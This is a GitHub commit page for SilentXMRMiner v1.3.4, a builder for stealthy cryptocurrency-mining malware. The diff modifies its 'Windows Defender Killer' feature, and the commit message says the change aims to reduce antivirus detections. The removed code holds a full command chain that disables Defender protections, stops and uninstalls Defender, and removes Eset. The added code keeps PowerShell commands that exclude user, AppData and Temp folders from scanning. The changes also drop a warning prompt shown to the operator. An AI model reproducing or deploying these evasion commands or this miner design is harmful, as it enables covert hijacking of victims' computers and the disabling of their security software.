Skip to content
This repository has been archived by the owner on Sep 12, 2023. It is now read-only.

Commit

Permalink
Updated to v1.3.4
Browse files Browse the repository at this point in the history
* Made the Windows Defender Killer less intrusive, ironically to reduce detections
  • Loading branch information
UnamSanctam committed May 14, 2021
1 parent 434ac4a commit 434320f
Show file tree
Hide file tree
Showing 6 changed files with 9 additions and 14 deletions.
4 changes: 3 additions & 1 deletion README.md
Original file line number Diff line number Diff line change
@@ -1,7 +1,7 @@

<img src="https://github.com/UnamSanctam/SilentXMRMiner/blob/master/SilentXMRMiner.png?raw=true">

# SilentXMRMiner v1.3.3 - Based on Lime Miner v0.3
# SilentXMRMiner v1.3.4 - Based on Lime Miner v0.3

Can mine all the following algorithms and thus all the cryptocurrencies that use them: **cn/upx2**, **argon2/chukwav2**, **cn/ccx**, **kawpow**, **rx/keva**, **astrobwt**, **cn-pico/tlo**, **rx/sfx**, **rx/arq**, **rx/0**, **argon2/chukwa**, **argon2/wrkz**, **rx/wow**, **cn/fast**, **cn/rwz**, **cn/zls**, **cn/double**, **cn/r**, **cn-pico**, **cn/half**, **cn/2**, **cn/xao**, **cn/rto**, **cn-heavy/tube**, **cn-heavy/xhv**, **cn-heavy/0**, **cn/1**, **cn-lite/1**, **cn-lite/0** and **cn/0**.

Expand Down Expand Up @@ -37,6 +37,8 @@ You can find the new wiki [here](https://github.com/UnamSanctam/SilentXMRMiner/w

## Changes

### v1.3.4 (14/05/2021)
* Made the Windows Defender Killer less intrusive, ironically to reduce detections
### v1.3.3 (13/05/2021)
* Fixed possible CPU fluctuation
* Added Stealth support for Windows 7 Task Manager
Expand Down
3 changes: 1 addition & 2 deletions SilentXMRMiner/Advanced.Designer.vb

Some generated files are not rendered by default. Learn more about how customized files appear on GitHub.

10 changes: 2 additions & 8 deletions SilentXMRMiner/Advanced.vb
Original file line number Diff line number Diff line change
Expand Up @@ -29,14 +29,8 @@

Private Sub toggleKillWD_CheckedChanged(sender As Object) Handles toggleKillWD.CheckedChanged
If toggleKillWD.Checked Then
Select Case MessageBox.Show("This option is considered destructive and may harm your computer, the uninstaller may be able to revert some of its actions but not all. Do not use this on any important machines." + Environment.NewLine + Environment.NewLine + "Are you sure you want to enable this option?", "Warning!", MessageBoxButtons.YesNo, MessageBoxIcon.Warning)
Case DialogResult.Yes
toggleKillWD.Checked = True
toggleAdministrator.Checked = True
toggleUninstaller.Checked = True
Case Else
toggleKillWD.Checked = False
End Select
toggleAdministrator.Checked = True
toggleUninstaller.Checked = True
End If
End Sub
End Class
2 changes: 1 addition & 1 deletion SilentXMRMiner/Codedom.vb
Original file line number Diff line number Diff line change
Expand Up @@ -228,7 +228,7 @@ Public Class Codedom
Public Shared Sub ReplaceGlobals(ByRef stringb As StringBuilder)
If F.FA.toggleKillWD.Checked Then
stringb.Replace("DefKillWD", "true")
stringb.Replace("#KillWDCommands", F.EncryptString("powershell -Command Add-MpPreference -ExclusionPath '%cd%' & powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Set-MpPreference -DisableArchiveScanning $true & powershell -Command Set-MpPreference -DisableBehaviorMonitoring $true & powershell -Command Set-MpPreference -DisableRealtimeMonitoring $true & powershell -Command Set-MpPreference -DisableScriptScanning $true & powershell -Command Set-MpPreference -DisableIntrusionPreventionSystem $true & powershell -Command Set-MpPreference -DisableIOAVProtection $true & powershell -Command Set-MpPreference -EnableControlledFolderAccess Disabled & powershell -Command Set-MpPreference -EnableNetworkProtection AuditMode -Force & powershell -Command Set-MpPreference -MAPSReporting Disabled & powershell -Command Set-MpPreference -SubmitSamplesConsent NeverSend & sc config WinDefend start=disabled & sc stop WinDefend & powershell -Command Stop-Service WinDefend & powershell -Command Set-Service WinDefend -StartupType Disabled & powershell -Command Uninstall-WindowsFeature -Name Windows-Defender & powershell -Command Remove-WindowsFeature Windows-Defender, Windows-Defender-GUI & Dism /online /Disable-Feature /FeatureName:Windows-Defender /Remove /NoRestart /quiet & Wmic Product where name=""Eset Security"" call uninstall"))
stringb.Replace("#KillWDCommands", F.EncryptString("powershell -Command Add-MpPreference -ExclusionPath '%cd%' & powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & exit"))
End If

If F.FA.toggleEnableDebug.Checked Then
Expand Down
2 changes: 1 addition & 1 deletion SilentXMRMiner/Form1.Designer.vb

Some generated files are not rendered by default. Learn more about how customized files appear on GitHub.

2 changes: 1 addition & 1 deletion SilentXMRMiner/Resources/Uninstaller.cs
Original file line number Diff line number Diff line change
Expand Up @@ -126,7 +126,7 @@ public static void Main()
Process.Start(new ProcessStartInfo
{
FileName = "cmd",
Arguments = "/c powershell -Command Remove-MpPreference -ExclusionPath '%cd%' & powershell -Command Remove-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Remove-MpPreference -ExclusionPath '%AppData%' & powershell -Command Remove-MpPreference -ExclusionPath '%Temp%' & powershell -Command Set-MpPreference -DisableArchiveScanning $false & powershell -Command Set-MpPreference -DisableBehaviorMonitoring $false & powershell -Command Set-MpPreference -DisableRealtimeMonitoring $false & powershell -Command Set-MpPreference -DisableScriptScanning $false & powershell -Command Set-MpPreference -DisableIntrusionPreventionSystem $false & powershell -Command Set-MpPreference -DisableIOAVProtection $false & powershell -Command Set-MpPreference -EnableControlledFolderAccess Enabled & sc config WinDefend start=enabled & sc start WinDefend & powershell -Command Start-Service WinDefend & powershell -Command Set-Service WinDefend -StartupType Enabled & powershell -Command Install-WindowsFeature -Name Windows-Defender & powershell -Command Add-WindowsFeature Windows-Defender, Windows-Defender-GUI & Dism /online /Enable-Feature /FeatureName:Windows-Defender /NoRestart /quiet & exit",
Arguments = "/c powershell -Command Remove-MpPreference -ExclusionPath '%cd%' & powershell -Command Remove-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Remove-MpPreference -ExclusionPath '%AppData%' & powershell -Command Remove-MpPreference -ExclusionPath '%Temp%' & exit",
WindowStyle = ProcessWindowStyle.Hidden,
CreateNoWindow = true,
Verb = "runas"
Expand Down

0 comments on commit 434320f

Please sign in to comment.